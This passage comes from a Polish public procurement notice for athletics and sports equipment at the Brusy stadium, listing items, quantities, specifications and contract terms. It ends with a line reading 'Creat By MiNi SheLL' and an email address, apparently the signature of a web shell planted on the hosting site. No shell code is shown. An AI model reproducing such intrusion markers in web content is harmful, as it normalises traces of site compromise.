Certyfikat IAAF, wyczynowe, śr 40 mm, wykonane z rury aluminiowej, różne kolory4. Pachołek	20	wysokość min. 20 cm, kolor czerwony5. Pachołek	8	wysokość nie wyższa niż 15 cm, kolor czerwony 6. Chorągiewka sędziowska	10	biała, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej. 7. Chorągiewka sędziowska	10	czerwona, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej.8. Chorągiewka sędziowska	10	żółta, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej.9. Chorągiewka zielona na drzewcu 4	chorągiewka zielona na drzewcu z podstawą, do zaznaczania linii zejścia na 800 m i 4 x 400 m10. Stojak do skoku wzwyż	2	certyfikat IAAF, wyczynowy, aluminiowy, teleskopowy, zasięg od 115 cm do 265 cm, konstrukcja odporna na warunki atmosferyczne 11. Zeskok do skoku wzwyż	1	certyfikat IAAF, wymiary 5 x 3 x 0,75 m, wyczynowy, odporny na wilgoć.12. Pokrowiec na zeskok	1	Wykonany z nieprzemakalnego winylu, klamerki stalowe do łączenia z zeskokiem.13. Stelaż stalowy pod zeskok	1	Modułowa stalowa konstrukcja, wysokość 8-12 cm z wózkiem w zestawie14. Poprzeczka do skoku wzwyż	5	Certyfikat IAAF, wyczynowa15. Przymiar do skoku wzwyż	1	Pomiar do 3 m teleskopowy, aluminiowy16. Zestaw znaczników rozbiegu	5 kpl 6 znaczników w komplecie, wbijanych, metalowych, w sześciu kontrastowych kolorach, malowane proszkowo17. Listwa długości skoku	1	konstrukcja aluminiowa, na białym tle czarne cyfry ze skalą, po jednej stronie od 4,5 m do 8,5 m; po drugiej od 13,5 m do 17,5 m18. Niwelator do piachu	2	trwała stalowa konstrukcja, łopatki zagarniające po obu stronach profilu, uchwyty z rękojeścią zapewniającą duży komfort pracy, regulowane prowadnice niwelatora dostosowujące produkt do szerokości zeskoczni19. Szpilka do zaznaczania śladu	4	długość 0,7-1 m, stalowa, z przeznaczeniem do skoku w dal (2 szt.) oraz do pchnięcia kulą i rzutu oszczepem (po 1 szt.)20. Taśma miernicza	2	stalowa, zwijana, długość 10 metrów 21. Taśma miernicza	2	stalowa, zwijana, długość 20 metrów 22. Taśma miernicza	1	stalowa, zwijana, długość 100 metrów23. Taśma	1	taśma do wyznaczania sektora rzutów, w odcinkach o łącznej długości 400m, wraz z klamerkami do mocowania24. Kula	2	certyfikat IAAF, wyczynowa stalowa 7,26 kg, średnica 128 mm, malowana lakierem proszkowym.25. Kula	1	certyfikat IAAF, wyczynowa stalowa 7,26 kg, średnica 120 mm, malowana lakierem proszkowym.26. Kula	2	certyfikat IAAF, wyczynowa, stalowa 6 kg, średnica 125 mm, malowana lakierem proszkowym.27. Kula	1	certyfikat IAAF, wyczynowa, stalowa 6 kg, średnica. 115 mm, malowana lakierem proszkowym.28. Kula	2	certyfikat IAAF, wyczynowa, stalowa 5 kg, średnica. 120 mm, malowana lakierem proszkowym.29. Kula	1	certyfikat IAAF, wyczynowa, stalowa 5 kg, średnica. 110 mm, malowana lakierem proszkowym.30. Kula	2	certyfikat IAAF, wyczynowa, stalowa 4 kg, średnica. 110 mm malowana lakierem proszkowym.31. Kula	1	certyfikat IAAF, wyczynowa stalowa 4 kg, średnica. 95 mm, malowana lakierem proszkowym.32. Kula	2	certyfikat IAAF, wyczynowa, stalowa 3 kg, średnica. 110 mm, malowana lakierem proszkowym.33. Kula	1	certyfikat IAAF, wyczynowa stalowa, 3 kg, średnica. 95 mm, malowana lakierem proszkowym.34. Znacznik do zaznaczania śladu po rzucie	2kpl	w każdym komplecie po 10 szt. znaczników, wbijane, stalowe, lakierowane proszkowo35. Chorągiewka metalowa na szpilce	2	------------------------------------------------------------------36. Stojak uniwersalny (do kul i oszczepów)	1	stojak uniwersalny, na którym mieszczą się kule (minimum 12 sztuk) i oszczepy (minimum 12 sztuk) malowany lakierem proszkowym, przejezdny37. Oszczep	5	Certyfikat IAAF, waga 800 g, wyczynowy, różne sztywności.38. Oszczep	5	Certyfikat IAAF, waga 700 g, wyczynowy różne sztywności.39. Oszczep	5	Certyfikat IAAF, waga 600 g, wyczynowy, różne sztywności.40. Oszczep	5	Certyfikat IAAF, waga 500 g, wyczynowy, różne sztywności.41. Chorągiewki	4	stalowe, do oznaczenia końca sektora rzutów, czerwone z podstawą.42. Zestaw znaczników odległości do rzutu oszczepem	1kpl	wbijane, do konkurencji rzutowych, w komplecie 14 szt., wykonane ze stali malowanej proszkowo na biało, granatowe lub czarne cyfry, do rzutu oszczepem od 30 do 90m co 10m.43. Znaczniki do zaznaczania długości rzutu kulą	1kpl	wbijane, do konkurencji rzutowych, w komplecie 14 szt., wykonane ze stali malowanej proszkowo na biało, granatowe lub czarne cyfry, do pchnięcia kulą z cyframi od 10 do 22m co 2 metry.44. Podium dla zwycięzców	1	na konstrukcji stalowej, składane45. Pistolet startowy	1	do pistoletu należy dołączyć komplet nabojów (50 szt.)46. Klaps startowy	1	wykonany z drewna, wyposażony w wygodne uchwyty47. Stoper	8	stoper elektroniczny z pamięcią 10 wyników, maksymalny pomiar czasu: do 10 godzin, z dokładnością do 1/100 sekundy48. Chronometr z drukarką	1	chronometr z drukarką pozwalający na rejestrowanie i wydruk poszczególnych czasów, w skład zestawu wchodzi m.in.: torba transportowa, chronometr, oprogramowanie, 2 rolki papieru termicznego, zasilacz sieciowy, komplet baterii, kable sygnałowe START-STOP, pistolet startowy kompatybilny z chronometrem49. Wiatromierz elektroniczny	1	wiatromierz elektroniczny - ultradźwiękowy, na statywie, temperatura pracy: od -35oC do +70oC,50. Skrzynki z numerami torów	1 kpl	w zestawie komplet 6 skrzynek z numerami 1-6 z możliwością sygnalizacji falstartu51. Tablica informacyjna do informowania na mecie o liczbie okrążeni	1	dwucyfrowa, z dzwonkiem do sygnalizacji ostatniego okrążenia, wolnostojąca, wykonana ze spienionego PCV, rama tablicy wykonana z kształtowników stalowych52. Tablica prędkości wiatru	1	konstrukcja stalowa malowana proszkowo, złożona z elementów umożliwiających szybki montaż, kasety cyfrowe z tworzywa sztucznego53. Krzesło	12	krzesło turystyczne z oparciem, składane54. Słupek 5x5cm	12	słupek do ustawienia na liniach torów na przecięciu z linią zejścia55. Garaż najazdowy na zeskok	1	garaż metalowy na zeskok do skoku wzwyż do samodzielnego montażu56. Tablica informacyjna do podawania wyników	5	minimum dwurzędowa, minimum 9-cyfrowa, konstrukcja stalowa malowana proszkowo, kasety numeryczne z tworzywa sztucznego57. Rękaw lotniskowy	4	rękaw lotniskowy na drzewcu do wskazywania kierunku wiatru, wysokość 1,2m58. Belka do odbicia przy skoku w dal i trójskoku(W)	8	wyczynowa, każda belka powinna zawierać: listwę z plasteliną, listwę bez plasteliny (zaślepka), belkę nośną z łatwowymienialną belką odbicia, rury drenażowe i kratki odpływowe, skrobak do formowania plasteliny, plastelinę zapasową ok. 0,3kg59. Pokrywa zabezpieczająca do ramy belki	8	pokrywa do zabezpieczenia belki do skoku w dal/trójskoku60. Znaczniki oznaczające położenie belki	2kpl	komplet zawiera 2 znaczniki odbicia w formie daszku, wykonane z blachy aluminiowej, malowane proszkowo, w białym kolorze z granatowym pasem61. Szczotka kortowa	1	szczotka szerokości 2,0m, średni stopień twardości, aluminiowa rączka, uchwyt trapezowy2)	przeszkolić pracowników wskazanych przez Zamawiającego w zakresie obsługi dostarczonych urządzeń.3.	Wszystkie urządzenia i sprzęt mają być fabrycznie nowe i posiadać wymagane certyfikaty CE oraz niezbędne dokumenty wymagane przepisy umożliwiające bezpieczną pracę i obsługę.4.	Sprzęt sportowy lekkoatletyczny musi spełniać wymagania PZLA.5.	Sprzęt pomiarowy musi posiadać legalizację Głównego Urzędu Miar.6.	Wykonawca wykona i przygotuje oraz złoży w formie trwale spiętej wszelkie dokumenty dotyczące wykonanego przedmiotu zamówienia, a zwłaszcza:1)	instrukcje (w języku polskim) użytkowania zamontowanych urządzeń,2)	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich dostarczonych urządzeń,3)	dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu zamówienia,4)	inne dokumenty zgromadzone w trakcie realizacji zamówienia, a odnoszące się do jego realizacji,5)	właściwe oznaczenie i zabezpieczenie miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku,7.	Wykonawca zobowiązany jest do właściwego oznaczenia i zabezpieczenia miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku oraz prowadzenia prac montażowych zgodnie z wymogami BHP i p.poż., a także przepisami dotyczącymi ochrony środowiska.8.	Wykonawca zobowiązany jest do ponoszenia odpowiedzialności (w tym finansowej) za szkody powstałe na terenie realizacji przedmiotu zamówienia pozostające w związku przyczynowym z pracami prowadzonymi przez Wykonawcę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37400000-2, 37415000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zadanie pn. ,,Zagospodarowanie terenu stadionu w Brusach na cele sportowe w zakresie bieżni i urządzeń lekkoatletycznych z utwardzeniem terenu, boisk piłki siatkowej plażowej 2 szt., piłki nożnej na dz. 512/24, 512/25 i 512/52 w m. Brusy" dofinansowane ze środków Funduszu Rozwoju Kultury Fizycznej zadania inwestycyjnego w ramach Programu Rozwoju Infrastruktury Lekkoatletycznej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest dostawa sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach:Część II: zadanie pn. ,,Zagospodarowanie terenu stadionu w Brusach na cele sportowe w zakresie bieżni i urządzeń lekkoatletycznych z utwardzeniem terenu, boisk piłki siatkowej plażowej 2 szt., piłki nożnej na dz. 512/24, 512/25 i 512/52 w m. Brusy" dofinansowane ze środków Funduszu Rozwoju Kultury Fizycznej zadania inwestycyjnego w ramach Programu Rozwoju Infrastruktury Lekkoatletycznej.2.	Zamawiający zleca Wykonawcy, a Wykonawca zobowiązuje się:1)	sprzedać oraz dostarczyć i zamontować (jeśli sposób użytkowania wymaga montażu):Część II:Lp.	Rodzaj sprzętu	Ilośćszt. / kpl	Wymagania i opis1. Bramka piłkarska	2	bramka piłkarska o konstrukcji aluminiowej, kolor biały, przenośna, wymiary 5x2m, wyposażona w siatkę i obciążniki (3 szt.) 2. Kosiarka wrzecionowa	1	kosiarka wrzecionowa, samobieżna, minimalna szerokość cięcia 800mm, silnik benzynowy o mocy min. 6,5 KM, regulowana wysokość koszenia do 56mm, możliwość wymiany wrzeciona na inne kasety takie jak: wertykulator, aerator, skaryfikator, szczotka, które powinny być w zestawie, kosiarka wyposażona również w kosz do zbierania trawy oraz fotelik dla operatora3. Zegar elektroniczny zewnętrzny	1	zegar elektroniczny dwustronny o min. wym. 1700x600x40 mm, sterowany sygnałem GPS, z pomiarem temperatury, wyświetlanie naprzemienne: czasu, daty i temperatury, format wyświetlania: GG:MM (bez sekundnika), zasilanie 230V, zegar należy zamontować na elewacji budynku socjalno-sportowego w miejscu wskazanym przez Zamawiającego, podłączyć i uruchomić4. Stojak na rowery	1kpl	komplet stojaków na 60 miejsc postojowych, preferowane 12 stojaków po 5 miejsc postojowych w każdym stojaku, konstrukcja stalowa, minimalne rozmiary: długość 150cm, szerokość 40cm, wysokość 25cm2)	przeszkolić pracowników wskazanych przez Zamawiającego w zakresie obsługi dostarczonych urządzeń.3.	Wszystkie urządzenia i sprzęt mają być fabrycznie nowe i posiadać wymagane certyfikaty CE oraz niezbędne dokumenty wymagane przepisy umożliwiające bezpieczną pracę i obsługę.4.	Sprzęt sportowy lekkoatletyczny musi spełniać wymagania PZLA.5.	Sprzęt pomiarowy musi posiadać legalizację Głównego Urzędu Miar.6.	Wykonawca wykona i przygotuje oraz złoży w formie trwale spiętej wszelkie dokumenty dotyczące wykonanego przedmiotu zamówienia, a zwłaszcza:1)	instrukcje (w języku polskim) użytkowania zamontowanych urządzeń,2)	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich dostarczonych urządzeń,3)	dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu zamówienia,4)	inne dokumenty zgromadzone w trakcie realizacji zamówienia, a odnoszące się do jego realizacji,5)	właściwe oznaczenie i zabezpieczenie miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku,7.	Wykonawca zobowiązany jest do właściwego oznaczenia i zabezpieczenia miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku oraz prowadzenia prac montażowych zgodnie z wymogami BHP i p.poż., a także przepisami dotyczącymi ochrony środowiska.8.	Wykonawca zobowiązany jest do ponoszenia odpowiedzialności (w tym finansowej) za szkody powstałe na terenie realizacji przedmiotu zamówienia pozostające w związku przyczynowym z pracami prowadzonymi przez Wykonawcę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37400000-2, 37415000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com